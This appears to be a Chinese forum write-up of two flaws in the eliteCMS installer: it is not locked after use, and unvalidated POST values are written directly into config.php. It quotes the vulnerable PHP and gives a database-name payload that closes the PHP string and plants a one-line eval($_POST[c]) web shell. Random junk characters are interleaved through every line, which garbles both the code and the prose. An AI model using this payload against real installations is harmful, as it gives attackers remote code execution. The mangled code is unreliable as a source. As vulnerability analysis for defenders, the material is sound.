eliteCMS的安装程序安装结束后未作锁定,导致黑客可以通过访问安装程序地址进行重复安装; q1 f+ q/ W" |1 D
( ~- R$ Q. n: W8 q2 ]
另外一个漏洞是安装程序可以直接写入一句话到admin/includes/config.php3 [) | h1 T w8 t. Y0 m( `: z! W
我们来看代码:
/ z9 ]3 e+ O, x/ y' F. v: e$ [" @: [ % M! p* j' e: b5 T2 m5 p3 b
...8 K: M! Q5 @; h' k9 t6 e$ F
elseif ($_GET['step'] == "4") {6 x: a2 @2 Y' y2 U9 ]
$file = "../admin/includes/config.php";
1 ^7 S7 H, P3 x- S# [0 E$ J$ G $write = "<?php\n";, H/ h7 h. M9 L
$write .= "/**\n";) u: ~0 ?" M" Q* g) X! ^+ g
$write .= "*\n";7 b3 _; }2 c. f: V
$write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";8 `, q1 O6 b' X2 Z+ S
...略...8 G8 _ s( e7 V* O/ w
$write .= "*\n";" f% o9 `* I* y/ ^9 u/ B, B
$write .= "*/\n";
! ?6 z" R2 t' P! z9 y+ L $write .= "\n";$ O8 k2 I- Z% {6 \/ o% L
$write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";
5 {+ s8 j! @& E9 O+ F. s- b. c; ? $write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";
1 K, c4 \1 I: R0 C* ?' G $write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";
2 q# E- J: C U! P# y' G0 ]/ ~ $write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";
$ H- I! _# P; R( |6 V; L& W $write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";9 h" [) `8 F2 i$ E* P5 v
$write .= "if (!\$connection) {\n";
' k3 _0 {, l, c# {3 {+ p+ f $write .= " die(\"Database connection failed\" .mysql_error());\n";1 n& ~2 a* }, @& A. K2 y: J0 g3 G
$write .= " \n";
! H) I# R. k0 y# k0 r $write .= "} \n"; E, T* @4 B$ g1 ]( N
$write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";* z) F: V; B8 Y# G$ N1 D
$write .= "if (!\$db_select) {\n";
' S( _$ b/ w) t0 O; N% f3 Y $write .= " die(\"Database select failed\" .mysql_error());\n";
4 {# [4 O+ T3 y $write .= " \n";
0 W8 @8 O; ^6 l5 |( N0 B $write .= "} \n";
& ?4 O4 D3 Y5 S4 {% J% s $write .= "?>\n";
$ ?6 _/ t' i1 c4 Z3 X# N ! D( y z! X, H- D( B, @
$writer = fopen($file, 'w');
4 c+ w/ T# W& g3 Z. V2 v# `* `...
. z" s$ A: P B! |
0 F2 j! g' L# S) P- G. G. ]+ x在看代码:# b- C. }) X8 H/ w" X9 H# ^6 U4 S
/ x/ p% B/ i' Z% y
$_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];
9 p) y- J* e# t. `! \$_SESSION['DB_NAME'] = $_POST['DB_NAME'];( m R" x$ b# o& c
$_SESSION['DB_USER'] = $_POST['DB_USER'];7 K& R' I9 X9 _5 b* Q, I
$_SESSION['DB_PASS'] = $_POST['DB_PASS'];
! U0 R% E' d; g; e6 c & `' e! D( P7 n3 |& f$ m
取值未作任何验证
4 V% ~- H, R2 Y如果将数据库名POST数据:
! s' N* U# O) H$ W, ? ; a7 ?5 X3 u3 X( L: N6 N
"?><?php eval($_POST[c]);?><?php
; N. q u; r3 ~8 j3 y8 @+ q1 g4 n
5 N) x* w* d2 g8 g; q将导致一句话后门写入/admin/includes/config.php7 k; ]) G( {7 a! S
|